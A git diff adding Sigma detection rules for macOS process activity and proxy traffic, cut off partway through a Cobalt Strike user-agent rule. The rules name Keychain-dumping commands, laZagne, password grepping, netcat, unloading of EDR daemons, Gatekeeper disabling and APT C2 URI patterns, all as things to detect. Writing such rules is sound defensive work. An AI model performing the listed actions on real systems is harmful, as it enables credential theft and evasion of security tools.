b/bin/main/rules/others_macos/process_creation/proc_creation_macos_create_hidden_account.yml new file mode 100644 index 000000000..000f97f28 --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_create_hidden_account.yml @@ -0,0 +1,33 @@ +title: Hidden User Creation +id: b22a5b36-2431-493a-8be1-0bae56c28ef3 +status: test +description: Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option +author: Daniil Yugoslavskiy, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md +date: 2020/10/10 +modified: 2021/11/27 +logsource: + category: process_creation + product: macos +detection: + dscl_create: + Image|endswith: '/dscl' + CommandLine|contains: 'create' + id_below_500: + CommandLine|contains: UniqueID + CommandLine|re: '([0-9]|[1-9][0-9]|[1-4][0-9]{2})' + ishidden_option_declaration: + CommandLine|contains: 'IsHidden' + ishidden_option_confirmation: + CommandLine|contains: + - 'true' + - 'yes' + - '1' + condition: dscl_create and id_below_500 or dscl_create and (ishidden_option_declaration and ishidden_option_confirmation) +falsepositives: + - Legitimate administration activities +level: medium +tags: + - attack.defense_evasion + - attack.t1564.002 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_creds_from_keychain.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_creds_from_keychain.yml new file mode 100644 index 000000000..41b22a6b2 --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_creds_from_keychain.yml @@ -0,0 +1,30 @@ +title: Credentials from Password Stores - Keychain +id: b120b587-a4c2-4b94-875d-99c9807d6955 +status: test +description: Detects passwords dumps from Keychain +author: Tim Ismilyaev, oscd.community, Florian Roth +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md + - https://gist.github.com/Capybara/6228955 +date: 2020/10/19 +modified: 2021/11/27 +logsource: + category: process_creation + product: macos +detection: + selection1: + Image: '/usr/bin/security' + CommandLine|contains: + - 'find-certificate' + - ' export ' + selection2: + CommandLine|contains: + - ' dump-keychain ' + - ' login-keychain ' + condition: 1 of selection* +falsepositives: + - Legitimate administration activities +level: medium +tags: + - attack.credential_access + - attack.t1555.001 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_disable_security_tools.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_disable_security_tools.yml new file mode 100644 index 000000000..9475d3ff6 --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_disable_security_tools.yml @@ -0,0 +1,43 @@ +title: Disable Security Tools +id: ff39f1a6-84ac-476f-a1af-37fcdf53d7c0 +status: test +description: Detects disabling security tools +author: Daniil Yugoslavskiy, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md +date: 2020/10/19 +modified: 2021/11/27 +logsource: + category: process_creation + product: macos +detection: + launchctl_unload: + Image: '/bin/launchctl' + CommandLine|contains: 'unload' + security_plists: + CommandLine|contains: + - 'com.objective-see.lulu.plist' # Objective-See firewall management utility + - 'com.objective-see.blockblock.plist' # Objective-See persistence locations watcher/blocker + - 'com.google.santad.plist' # google santa + - 'com.carbonblack.defense.daemon.plist' # carbon black + - 'com.carbonblack.daemon.plist' # carbon black + - 'at.obdev.littlesnitchd.plist' # Objective Development Software firewall management utility + - 'com.tenablesecurity.nessusagent.plist' # Tenable Nessus + - 'com.opendns.osx.RoamingClientConfigUpdater.plist' # OpenDNS Umbrella + - 'com.crowdstrike.falcond.plist' # Crowdstrike Falcon + - 'com.crowdstrike.userdaemon.plist' # Crowdstrike Falcon + - 'osquery' # facebook osquery + - 'filebeat' # elastic log file shipper + - 'auditbeat' # elastic auditing agent/log shipper + - 'packetbeat' # elastic network logger/shipper + - 'td-agent' # fluentd log shipper + disable_gatekeeper: + Image: '/usr/sbin/spctl' + CommandLine|contains: 'disable' + condition: (launchctl_unload and security_plists) or disable_gatekeeper +falsepositives: + - Legitimate activities +level: medium +tags: + - attack.defense_evasion + - attack.t1562.001 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml new file mode 100644 index 000000000..c4159b43a --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml @@ -0,0 +1,32 @@ +title: File and Directory Discovery +id: 089dbdf6-b960-4bcc-90e3-ffc3480c20f6 +status: test +description: Detects usage of system utilities to discover files and directories +author: Daniil Yugoslavskiy, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md +date: 2020/10/19 +modified: 2021/11/27 +logsource: + category: process_creation + product: macos +detection: + select_file_with_asterisk: + Image: '/usr/bin/file' + CommandLine|re: '(.){200,}' # execution of the 'file */* *>> /tmp/output.txt' will produce huge commandline + select_recursive_ls: + Image: '/bin/ls' + CommandLine|contains: '-R' + select_find_execution: + Image: '/usr/bin/find' + select_mdfind_execution: + Image: '/usr/bin/mdfind' + select_tree_execution|endswith: + Image: '/tree' + condition: 1 of select* +falsepositives: + - Legitimate activities +level: informational +tags: + - attack.discovery + - attack.t1083 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_find_cred_in_files.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_find_cred_in_files.yml new file mode 100644 index 000000000..ae273c242 --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_find_cred_in_files.yml @@ -0,0 +1,25 @@ +title: 'Credentials In Files' +id: 53b1b378-9b06-4992-b972-dde6e423d2b4 +status: test +description: 'Detecting attempts to extract passwords with grep and laZagne' +author: 'Igor Fits, Mikhail Larin, oscd.community' +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md +date: 2020/10/19 +modified: 2021/11/27 +logsource: + product: macos + category: process_creation +detection: + selection1: + Image|endswith: '/grep' + CommandLine|contains: 'password' + selection2: + CommandLine|contains: 'laZagne' + condition: selection1 or selection2 +falsepositives: + - Unknown +level: high +tags: + - attack.credential_access + - attack.t1552.001 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_gui_input_capture.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_gui_input_capture.yml new file mode 100644 index 000000000..ac814a811 --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_gui_input_capture.yml @@ -0,0 +1,39 @@ +title: GUI Input Capture - macOS +id: 60f1ce20-484e-41bd-85f4-ac4afec2c541 +status: experimental +description: Detects attempts to use system dialog prompts to capture user credentials +author: remotephone, oscd.community +date: 2020/10/13 +modified: 2021/12/02 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md + - https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/ +logsource: + product: macos + category: process_creation +detection: + selection1: + Image: '/usr/sbin/osascript' + selection2: + CommandLine|contains|all: + - '-e' + - 'display' + - 'dialog' + - 'answer' + selection3: + CommandLine|contains: + - 'admin' + - 'administrator' + - 'authenticate' + - 'authentication' + - 'credentials' + - 'pass' + - 'password' + - 'unlock' + condition: all of selection* +falsepositives: + - Legitimate administration tools and activities +level: low +tags: + - attack.credential_access + - attack.t1056.002 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_local_account.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_local_account.yml new file mode 100644 index 000000000..75dd152ca --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_local_account.yml @@ -0,0 +1,42 @@ +title: Local System Accounts Discovery +id: ddf36b67-e872-4507-ab2e-46bda21b842c +status: test +description: Detects enumeration of local systeam accounts on MacOS +author: Alejandro Ortuno, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md +date: 2020/10/08 +modified: 2021/11/27 +logsource: + category: process_creation + product: macos +detection: + selection_1: + Image|endswith: '/dscl' + CommandLine|contains|all: + - 'list' + - '/users' + selection_2: + Image|endswith: '/dscacheutil' + CommandLine|contains|all: + - '-q' + - 'user' + selection_3: + CommandLine|contains: '''x:0:''' + selection_4: + Image|endswith: '/cat' + CommandLine|contains: + - '/etc/passwd' + - '/etc/sudoers' + selection_5: + Image|endswith: '/id' + selection_6: + Image|endswith: '/lsof' + CommandLine|contains: '-u' + condition: 1 of selection* +falsepositives: + - Legitimate administration activities +level: low +tags: + - attack.discovery + - attack.t1087.001 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_local_groups.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_local_groups.yml new file mode 100644 index 000000000..4701c17c3 --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_local_groups.yml @@ -0,0 +1,33 @@ +title: Local Groups Discovery +id: 89bb1f97-c7b9-40e8-b52b-7d6afbd67276 +status: test +description: Detects enumeration of local system groups +author: Ömer Günal, Alejandro Ortuno, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md +date: 2020/10/11 +modified: 2021/11/27 +logsource: + category: process_creation + product: macos +detection: + selection_1: + Image|endswith: '/dscacheutil' + CommandLine|contains|all: + - '-q' + - 'group' + selection_2: + Image|endswith: '/cat' + CommandLine|contains: '/etc/group' + selection_3: + Image|endswith: '/dscl' + CommandLine|contains|all: + - '-list' + - '/groups' + condition: 1 of selection* +falsepositives: + - Legitimate administration activities +level: informational +tags: + - attack.discovery + - attack.t1069.001 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_network_service_scanning.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_network_service_scanning.yml new file mode 100644 index 000000000..fc2e432c9 --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_network_service_scanning.yml @@ -0,0 +1,30 @@ +title: MacOS Network Service Scanning +id: 84bae5d4-b518-4ae0-b331-6d4afd34d00f +status: test +description: Detects enumeration of local or remote network services. +author: Alejandro Ortuno, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md +date: 2020/10/21 +modified: 2021/11/27 +logsource: + category: process_creation + product: macos +detection: + selection_1: + Image|endswith: + - '/nc' + - '/netcat' + selection_2: + Image|endswith: + - '/nmap' + - '/telnet' + filter: + CommandLine|contains: 'l' + condition: (selection_1 and not filter) or selection_2 +falsepositives: + - Legitimate administration activities +level: low +tags: + - attack.discovery + - attack.t1046 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_network_sniffing.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_network_sniffing.yml new file mode 100644 index 000000000..dd0ae18f3 --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_network_sniffing.yml @@ -0,0 +1,25 @@ +title: Network Sniffing +id: adc9bcc4-c39c-4f6b-a711-1884017bf043 +status: test +description: Detects the usage of tooling to sniff network traffic. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. +author: Alejandro Ortuno, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md +date: 2020/10/14 +modified: 2021/11/27 +logsource: + category: process_creation + product: macos +detection: + selection: + Image|endswith: + - '/tcpdump' + - '/tshark' + condition: selection +falsepositives: + - Legitimate administration activities +level: informational +tags: + - attack.discovery + - attack.credential_access + - attack.t1040 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_remote_system_discovery.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_remote_system_discovery.yml new file mode 100644 index 000000000..3aa5400fa --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_remote_system_discovery.yml @@ -0,0 +1,46 @@ +title: Macos Remote System Discovery +id: 10227522-8429-47e6-a301-f2b2d014e7ad +status: test +description: Detects the enumeration of other remote systems. +author: Alejandro Ortuno, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md +date: 2020/10/22 +modified: 2021/11/27 +logsource: + category: process_creation + product: macos +detection: + selection_1: + Image|endswith: '/arp' + CommandLine|contains: '-a' + selection_2: + Image|endswith: '/ping' + CommandLine|contains: + - ' 10.' #10.0.0.0/8 + - ' 192.168.' #192.168.0.0/16 + - ' 172.16.' #172.16.0.0/12 + - ' 172.17.' + - ' 172.18.' + - ' 172.19.' + - ' 172.20.' + - ' 172.21.' + - ' 172.22.' + - ' 172.23.' + - ' 172.24.' + - ' 172.25.' + - ' 172.26.' + - ' 172.27.' + - ' 172.28.' + - ' 172.29.' + - ' 172.30.' + - ' 172.31.' + - ' 127.' #127.0.0.0/8 + - ' 169.254.' #169.254.0.0/16 + condition: 1 of selection* +falsepositives: + - Legitimate administration activities +level: informational +tags: + - attack.discovery + - attack.t1018 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml new file mode 100644 index 000000000..98db020a8 --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml @@ -0,0 +1,25 @@ +title: Scheduled Cron Task/Job +id: 7c3b43d8-d794-47d2-800a-d277715aa460 +status: test +description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder. +author: Alejandro Ortuno, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md +date: 2020/10/06 +modified: 2021/11/27 +logsource: + category: process_creation + product: macos +detection: + selection: + Image|endswith: '/crontab' + CommandLine|contains: '/tmp/' + condition: selection +falsepositives: + - Legitimate administration activities +level: medium +tags: + - attack.execution + - attack.persistence + - attack.privilege_escalation + - attack.t1053.003 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_screencapture.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_screencapture.yml new file mode 100644 index 000000000..7d38e1974 --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_screencapture.yml @@ -0,0 +1,23 @@ +title: Screen Capture - macOS +id: 0877ed01-da46-4c49-8476-d49cdd80dfa7 +status: test +description: Detects attempts to use screencapture to collect macOS screenshots +author: remotephone, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md + - https://github.com/BC-SECURITY/Empire/blob/master/lib/modules/python/collection/osx/screenshot.py +date: 2020/10/13 +modified: 2021/11/27 +logsource: + product: macos + category: process_creation +detection: + selection: + Image: '/usr/sbin/screencapture' + condition: selection +falsepositives: + - Legitimate user activity taking screenshots +level: low +tags: + - attack.collection + - attack.t1113 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_security_software_discovery.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_security_software_discovery.yml new file mode 100644 index 000000000..f20aab853 --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_security_software_discovery.yml @@ -0,0 +1,39 @@ +title: Security Software Discovery +id: 0ed75b9c-c73b-424d-9e7d-496cd565fbe0 +status: test +description: Detects usage of system utilities (only grep for now) to discover security software discovery +author: Daniil Yugoslavskiy, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md +date: 2020/10/19 +modified: 2021/11/27 +logsource: + category: process_creation + product: macos +detection: + grep_execution: + Image: '/usr/bin/grep' + security_services_and_processes: + CommandLine|contains: + - 'nessusd' # nessus vulnerability scanner + - 'santad' # google santa + - 'CbDefense' # carbon black + - 'falcond' # crowdstrike falcon + - 'td-agent' # fluentd log shipper + - 'packetbeat' # elastic network logger/shipper + - 'filebeat' # elastic log file shipper + - 'auditbeat' # elastic auditing agent/log shipper + - 'osqueryd' # facebook osquery + - 'BlockBlock' # Objective-See persistence locations watcher/blocker + - 'LuLu' # Objective-See firewall management utility + little_snitch_process: # Objective Development Software firewall management utility + CommandLine|contains|all: + - 'Little' + - 'Snitch' + condition: grep_execution and security_services_and_processes or grep_execution and little_snitch_process +falsepositives: + - Legitimate activities +level: medium +tags: + - attack.discovery + - attack.t1518.001 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_space_after_filename.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_space_after_filename.yml new file mode 100644 index 000000000..aad075ccd --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_space_after_filename.yml @@ -0,0 +1,23 @@ +title: Space After Filename - macOS +id: b6e2a2e3-2d30-43b1-a4ea-071e36595690 +status: experimental +description: Detects attempts to masquerade as legitimate files by adding a space to the end of the filename. +author: remotephone +date: 2021/11/20 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md +logsource: + product: macos + category: process_creation +detection: + selection1: + CommandLine|endswith: ' ' + selection2: + ImageName|endswith: ' ' + condition: selection1 or selection2 +falsepositives: + - Mistyped commands or legitimate binaries named to match the pattern +level: low +tags: + - attack.defense_evasion + - attack.t1036.006 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_split_file_into_pieces.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_split_file_into_pieces.yml new file mode 100644 index 000000000..077c41844 --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_split_file_into_pieces.yml @@ -0,0 +1,22 @@ +title: 'Split A File Into Pieces' +id: 7f2bb9d5-6395-4de5-969c-70c11fbe6b12 +status: test +description: 'Detection use of the command "split" to split files into parts and possible transfer.' +author: 'Igor Fits, Mikhail Larin, oscd.community' +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md +date: 2020/10/15 +modified: 2021/11/27 +logsource: + product: macos + category: process_creation +detection: + selection: + Image|endswith: '/split' + condition: selection +falsepositives: + - Legitimate administrative activity +level: low +tags: + - attack.exfiltration + - attack.t1030 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_susp_histfile_operations.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_susp_histfile_operations.yml new file mode 100644 index 000000000..501651898 --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_susp_histfile_operations.yml @@ -0,0 +1,29 @@ +title: 'Suspicious History File Operations' +id: 508a9374-ad52-4789-b568-fc358def2c65 +status: test +description: 'Detects commandline operations on shell history files' +author: 'Mikhail Larin, oscd.community' +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md +date: 2020/10/17 +modified: 2021/11/27 +logsource: + product: macos + category: process_creation +detection: + selection: + CommandLine|contains: + - '.bash_history' + - '.zsh_history' + - '.zhistory' + - '.history' + - '.sh_history' + - 'fish_history' + condition: selection +falsepositives: + - Legitimate administrative activity + - Legitimate software, cleaning hist file +level: medium +tags: + - attack.credential_access + - attack.t1552.003 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml new file mode 100644 index 000000000..cc89eebfe --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml @@ -0,0 +1,27 @@ +title: Suspicious MacOS Firmware Activity +id: 7ed2c9f7-c59d-4c82-a7e2-f859aa676099 +status: experimental +description: Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers. +author: Austin Songer @austinsonger +date: 2021/09/30 +references: + - https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml + - https://www.manpagez.com/man/8/firmwarepasswd/ + - https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web +logsource: + category: process_creation + product: macos +detection: + selection1: + Image: '/usr/sbin/firmwarepasswd' + CommandLine|contains: + - 'setpasswd' + - 'full' + - 'delete' + - 'check' + condition: selection1 +falsepositives: + - Legitimate administration activities +level: medium +tags: + - attack.impact diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml new file mode 100644 index 000000000..6b5b1523f --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml @@ -0,0 +1,27 @@ +title: System Network Connections Discovery +id: 9a7a0393-2144-4626-9bf1-7c2f5a7321db +status: test +description: Detects usage of system utilities to discover system network connections +author: Daniil Yugoslavskiy, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md +date: 2020/10/19 +modified: 2021/11/27 +logsource: + category: process_creation + product: macos +detection: + selection: + Image: + - '/usr/bin/who' + - '/usr/bin/w' + - '/usr/bin/last' + - '/usr/sbin/lsof' + - '/usr/sbin/netstat' + condition: selection +falsepositives: + - Legitimate activities +level: informational +tags: + - attack.discovery + - attack.t1049 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_system_network_discovery.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_system_network_discovery.yml new file mode 100644 index 000000000..b012b58cb --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_system_network_discovery.yml @@ -0,0 +1,33 @@ +title: System Network Discovery - macOS +id: 58800443-f9fc-4d55-ae0c-98a3966dfb97 +status: test +description: Detects enumeration of local network configuration +author: remotephone, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md +date: 2020/10/06 +modified: 2021/11/27 +logsource: + product: macos + category: process_creation +detection: + selection1: + Image: + - '/usr/sbin/netstat' + - '/sbin/ifconfig' + - '/usr/sbin/ipconfig' + - '/usr/libexec/ApplicationFirewall/socketfilterfw' + - '/usr/sbin/networksetup' + - '/usr/sbin/arp' + selection2: + Image: '/usr/bin/defaults' + CommandLine|contains|all: + - 'read' + - '/Library/Preferences/com.apple.alf' + condition: selection1 or selection2 +falsepositives: + - Legitimate administration activities +level: informational +tags: + - attack.discovery + - attack.t1016 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml new file mode 100644 index 000000000..27326b8bf --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml @@ -0,0 +1,25 @@ +title: 'System Shutdown/Reboot' +id: 40b1fbe2-18ea-4ee7-be47-0294285811de +status: test +description: 'Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.' +author: 'Igor Fits, Mikhail Larin, oscd.community' +references: + - hhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md +date: 2020/10/19 +modified: 2021/11/27 +logsource: + product: macos + category: process_creation +detection: + selection: + Image|endswith: + - '/shutdown' + - '/reboot' + - '/halt' + condition: selection +falsepositives: + - Legitimate administrative activity +level: informational +tags: + - attack.impact + - attack.t1529 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml new file mode 100644 index 000000000..d9a9c3747 --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml @@ -0,0 +1,25 @@ +title: Gatekeeper Bypass via Xattr +id: f5141b6d-9f42-41c6-a7bf-2a780678b29b +status: test +description: Detects macOS Gatekeeper bypass via xattr utility +author: Daniil Yugoslavskiy, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md +date: 2020/10/19 +modified: 2021/11/27 +logsource: + category: process_creation + product: macos +detection: + selection: + Image|endswith: '/xattr' + CommandLine|contains|all: + - '-r' + - 'com.apple.quarantine' + condition: selection +falsepositives: + - Legitimate activities +level: low +tags: + - attack.defense_evasion + - attack.t1553.001 diff --git a/bin/main/rules/others_proxy/proxy_apt40.yml b/bin/main/rules/others_proxy/proxy_apt40.yml new file mode 100644 index 000000000..ad78cd5f8 --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_apt40.yml @@ -0,0 +1,27 @@ +title: APT40 Dropbox Tool User Agent +id: 5ba715b6-71b7-44fd-8245-f66893e81b3d +status: test +description: Detects suspicious user agent string of APT40 Dropbox tool +author: Thomas Patzke +references: + - Internal research from Florian Roth +date: 2019/11/12 +modified: 2021/11/27 +logsource: + category: proxy +detection: + selection: + c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36' + r-dns: 'api.dropbox.com' + condition: selection +fields: + - c-ip + - c-uri +falsepositives: + - Old browsers +level: high +tags: + - attack.command_and_control + - attack.t1071.001 + - attack.exfiltration + - attack.t1567.002 diff --git a/bin/main/rules/others_proxy/proxy_apt_domestic_kitten.yml b/bin/main/rules/others_proxy/proxy_apt_domestic_kitten.yml new file mode 100644 index 000000000..4e697a836 --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_apt_domestic_kitten.yml @@ -0,0 +1,26 @@ +title: Domestic Kitten FurBall Malware Pattern +id: 6c939dfa-c710-4e12-a4dd-47e1f10e68e1 +status: experimental +description: Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group +author: Florian Roth +references: + - https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/ +date: 2021/02/08 +tags: + - attack.command_and_control +logsource: + category: proxy +detection: + selection: + c-uri|contains: + - 'Get~~~AllBrowser' + - 'Get~~~HardwareInfo' + - 'Take~~RecordCall' + - 'Reset~~~AllCommand' + condition: selection +fields: + - c-ip + - c-uri +falsepositives: + - Unlikely +level: high diff --git a/bin/main/rules/others_proxy/proxy_baby_shark.yml b/bin/main/rules/others_proxy/proxy_baby_shark.yml new file mode 100644 index 000000000..07342d1de --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_baby_shark.yml @@ -0,0 +1,20 @@ +title: BabyShark Agent Pattern +id: 304810ed-8853-437f-9e36-c4975c3dfd7e +status: experimental +description: Detects Baby Shark C2 Framework communication patterns +author: Florian Roth +date: 2021/06/09 +references: + - https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845 +logsource: + category: proxy +detection: + selection: + c-uri|contains: 'momyshark?key=' + condition: selection +falsepositives: + - Unknown +level: critical +tags: + - attack.command_and_control + - attack.t1071.001 diff --git a/bin/main/rules/others_proxy/proxy_chafer_malware.yml b/bin/main/rules/others_proxy/proxy_chafer_malware.yml new file mode 100644 index 000000000..eea3ebbfc --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_chafer_malware.yml @@ -0,0 +1,25 @@ +title: Chafer Malware URL Pattern +id: fb502828-2db0-438e-93e6-801c7548686d +status: test +description: Detects HTTP requests used by Chafer malware +author: Florian Roth +references: + - https://securelist.com/chafer-used-remexi-malware/89538/ +date: 2019/01/31 +modified: 2021/11/27 +logsource: + category: proxy +detection: + selection: + c-uri|contains: '/asp.asp?ui=' + condition: selection +fields: + - ClientIP + - c-uri + - c-useragent +falsepositives: + - Unknown +level: critical +tags: + - attack.command_and_control + - attack.t1071.001 diff --git a/bin/main/rules/others_proxy/proxy_cobalt_amazon.yml b/bin/main/rules/others_proxy/proxy_cobalt_amazon.yml new file mode 100644 index 000000000..d7b410e72 --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_cobalt_amazon.yml @@ -0,0 +1,32 @@ +title: CobaltStrike Malleable Amazon Browsing Traffic Profile +id: 953b895e-5cc9-454b-b183-7f3db555452e +status: test +description: Detects Malleable Amazon Profile +author: Markus Neis +references: + - https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/amazon.profile + - https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100 +date: 2019/11/12 +modified: 2021/11/27 +logsource: + category: proxy +detection: + selection1: + c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' + cs-method: 'GET' + c-uri: '/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books' + cs-host: 'www.amazon.com' + cs-cookie|endswith: '=csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996' + selection2: + c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' + cs-method: 'POST' + c-uri: '/N4215/adj/amzn.us.sr.aps' + cs-host: 'www.amazon.com' + condition: selection1 or selection2 +falsepositives: + - Unknown +level: high +tags: + - attack.defense_evasion + - attack.command_and_control + - attack.t1071.001 diff --git a/bin/main/rules/others_proxy/proxy_cobalt_malformed_uas.yml b/bin/main/rules/others_proxy/proxy_cobalt_malformed_uas.yml new file mode 100644 index 000000000..a7fec2988 --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_cobalt_malformed_uas.yml @@ -0,0 +1,27 @@ +title: CobaltStrike Malformed UAs in Malleable Profiles +id: 41b42a36-f62c-4c34-bd40-8cb804a34ad8 +status: experimental +description: Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike +author: Florian Roth +date: 2021/05/06 +modified: 2021/11/02 +references: + - https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/ +logsource: + category: proxy +detection: + selection1: + c-useragent: + - 'Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)' + - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E 